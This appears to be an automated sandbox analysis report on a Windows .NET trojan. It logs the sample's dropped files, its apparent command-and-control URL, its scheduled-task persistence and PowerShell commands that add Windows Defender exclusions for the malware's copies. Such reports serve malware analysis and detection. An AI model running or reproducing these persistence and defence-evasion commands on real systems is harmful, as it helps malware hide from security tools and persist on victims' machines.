Source: steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.1930279063.00000000030DB000.00000004.00000800.00020000.00000000.sdmp, steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.1930279063.00000000032A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://337703cm.n9sh.top
Source: steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.1930279063.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://337703cm.n9sh.top/
Source: steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.1930279063.00000000030DB000.00000004.00000800.00020000.00000000.sdmp, steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.2158771619.000000001B3D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://337703cm.n9sh.top/Basecentral.php
Source: powershell.exe, 00000017.00000002.3319320381.000002232C6EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.miYy
Source: powershell.exe, 0000001E.00000002.3316028895.000001EA5F41E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000001E.00000002.3316028895.000001EA5F41E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000018.00000002.3240116143.00000202763E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3144175197.0000014DD8E15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3176239130.0000028343806000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2980854227.000001EA57066000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2967168155.000002B990076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000020.00000002.1898978062.000002B980227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000017.00000002.1907943150.0000022314558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1919842164.0000020266598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1907889706.0000014DC8FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1907759748.00000283339B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1904170467.000001EA47217000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1898978062.000002B980227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 0J5DzstGPi.exe, 00000000.00000002.1803810582.00000000034D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1907943150.0000022314331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1919842164.0000020266371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1907889706.0000014DC8DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1907759748.0000028333791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1904170467.000001EA46FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1898978062.000002B980001000.00000004.00000800.00020000.00000000.sdmp, steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.1930279063.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000017.00000002.1907943150.0000022314558000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1919842164.0000020266598000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1907889706.0000014DC8FC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1907759748.00000283339B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1904170467.000001EA47217000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1898978062.000002B980227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000020.00000002.1898978062.000002B980227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001E.00000002.3291262702.000001EA5F122000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000017.00000002.1907943150.0000022314331000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1919842164.0000020266371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1907889706.0000014DC8DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1907759748.0000028333791000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1904170467.000001EA46FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1898978062.000002B980001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000020.00000002.2967168155.000002B990076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.2967168155.000002B990076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.2967168155.000002B990076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000020.00000002.1898978062.000002B980227000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.3240116143.00000202763E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3144175197.0000014DD8E15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3176239130.0000028343806000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2980854227.000001EA57066000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2967168155.000002B990076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe\:Zone.Identifier:$DATA	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	File created: C:\Windows\Branding\17c9f4d4cfaa6e	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSC7B104E16ED56415BA0A4E98DBA784BC.TMP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSC7B104E16ED56415BA0A4E98DBA784BC.TMP

Jump to behavior

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 0_2_00007FFD9BCAA351	0_2_00007FFD9BCAA351
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 0_2_00007FFD9BCACAC8	0_2_00007FFD9BCACAC8
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 47_2_00007FFD9B8A0D7C	47_2_00007FFD9B8A0D7C
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 47_2_00007FFD9BC9A20D	47_2_00007FFD9BC9A20D
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 48_2_00007FFD9B880D7C	48_2_00007FFD9B880D7C
Source: C:\Recovery\sihost.exe	Code function: 55_2_00007FFD9B8B0D7C	55_2_00007FFD9B8B0D7C
Source: C:\Recovery\sihost.exe	Code function: 55_2_00007FFD9B8B96BB	55_2_00007FFD9B8B96BB
Source: C:\Recovery\sihost.exe	Code function: 55_2_00007FFD9B8E16EA	55_2_00007FFD9B8E16EA
Source: C:\Recovery\sihost.exe	Code function: 55_2_00007FFD9B8ED40D	55_2_00007FFD9B8ED40D
Source: C:\Recovery\sihost.exe	Code function: 55_2_00007FFD9B8E9321	55_2_00007FFD9B8E9321
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 56_2_00007FFD9B8B0D7C	56_2_00007FFD9B8B0D7C
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 56_2_00007FFD9B8B96BE	56_2_00007FFD9B8B96BE
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 56_2_00007FFD9B8B9506	56_2_00007FFD9B8B9506
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 56_2_00007FFD9B8E16EA	56_2_00007FFD9B8E16EA
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 56_2_00007FFD9B8ED40D	56_2_00007FFD9B8ED40D
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 56_2_00007FFD9B8E9321	56_2_00007FFD9B8E9321
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 57_2_00007FFD9B8A0D7C	57_2_00007FFD9B8A0D7C
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 57_2_00007FFD9B8D16EA	57_2_00007FFD9B8D16EA
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 57_2_00007FFD9B8DD40D	57_2_00007FFD9B8DD40D
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 57_2_00007FFD9B8D9321	57_2_00007FFD9B8D9321
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 57_2_00007FFD9B8A96BB	57_2_00007FFD9B8A96BB

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\BKvCmawc.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254

Source: 0J5DzstGPi.exe, 00000000.00000002.1860162016.000000001C087000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 0J5DzstGPi.exe
Source: 0J5DzstGPi.exe, 00000000.00000002.1860162016.000000001C087000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs 0J5DzstGPi.exe
Source: 0J5DzstGPi.exe, 00000000.00000000.1724618410.0000000000992000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0J5DzstGPi.exe
Source: 0J5DzstGPi.exe, 00000023.00000002.2549228153.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0J5DzstGPi.exe
Source: 0J5DzstGPi.exe, 00000023.00000002.2549228153.0000000002CB0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0J5DzstGPi.exe
Source: 0J5DzstGPi.exe, 00000023.00000002.2549228153.0000000002CCC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0J5DzstGPi.exe
Source: 0J5DzstGPi.exe, 00000024.00000002.2478669325.0000000002D00000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0J5DzstGPi.exe
Source: 0J5DzstGPi.exe, 00000024.00000002.2478669325.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0J5DzstGPi.exe
Source: 0J5DzstGPi.exe, 00000024.00000002.2478669325.0000000002D12000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0J5DzstGPi.exe
Source: 0J5DzstGPi.exe, 00000039.00000002.2193747758.0000000003300000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0J5DzstGPi.exe
Source: 0J5DzstGPi.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 0J5DzstGPi.exe

Source: 0J5DzstGPi.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0J5DzstGPi.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: steBCuuQsIefcKufvgYbRBCxKhPR.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sihost.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: steBCuuQsIefcKufvgYbRBCxKhPR.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: steBCuuQsIefcKufvgYbRBCxKhPR.exe1.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0J5DzstGPi.exe, ClS6ZS2Ih1e0y9FFSfj.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0J5DzstGPi.exe, ClS6ZS2Ih1e0y9FFSfj.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0J5DzstGPi.exe, ClS6ZS2Ih1e0y9FFSfj.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0J5DzstGPi.exe, ClS6ZS2Ih1e0y9FFSfj.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@55/66@1/1

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

File created: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe

Jump to behavior

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

File created: C:\Users\user\Desktop\MzWJdjDq.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3140:120:WilError_03
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Mutant created: NULL
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-zKuh3mANZO06VVBE5KQN
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

File created: C:\Users\user\AppData\Local\Temp\qchs0ptz

Jump to behavior

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LBEMCr2GFO.bat"

Source: 0J5DzstGPi.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0J5DzstGPi.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0J5DzstGPi.exe	Virustotal: Detection: 59%
Source: 0J5DzstGPi.exe	ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

File read: C:\Users\user\Desktop\0J5DzstGPi.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\0J5DzstGPi.exe "C:\Users\user\Desktop\0J5DzstGPi.exe"
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8C8.tmp" "c:\Windows\System32\CSC7B104E16ED56415BA0A4E98DBA784BC.TMP"
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "steBCuuQsIefcKufvgYbRBCxKhPRs" /sc MINUTE /mo 6 /tr "'C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe'" /f
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0J5DzstGPi0" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\0J5DzstGPi.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\steBCuuQsIefcKufvgYbRBCxKhPR.exe'
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\steBCuuQsIefcKufvgYbRBCxKhPR.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\sihost.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\0J5DzstGPi.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\Desktop\0J5DzstGPi.exe C:\Users\user\Desktop\0J5DzstGPi.exe
Source: unknown	Process created: C:\Users\user\Desktop\0J5DzstGPi.exe C:\Users\user\Desktop\0J5DzstGPi.exe
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LBEMCr2GFO.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Recovery\sihost.exe C:\Recovery\sihost.exe
Source: unknown	Process created: C:\Recovery\sihost.exe C:\Recovery\sihost.exe
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe "C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\Recovery\sihost.exe "C:\Recovery\sihost.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe "C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
Source: unknown	Process created: C:\Users\user\Desktop\0J5DzstGPi.exe "C:\Users\user\Desktop\0J5DzstGPi.exe"
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline"	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "steBCuuQsIefcKufvgYbRBCxKhPRs" /sc MINUTE /mo 6 /tr "'C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe'" /f	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\steBCuuQsIefcKufvgYbRBCxKhPR.exe'	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\sihost.exe'	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "0J5DzstGPi0" /sc MINUTE /mo 12 /tr "'C:\Users\user\Desktop\0J5DzstGPi.exe'" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe'	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\0J5DzstGPi.exe'	Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\LBEMCr2GFO.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8C8.tmp" "c:\Windows\System32\CSC7B104E16ED56415BA0A4E98DBA784BC.TMP"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe "C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe"
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
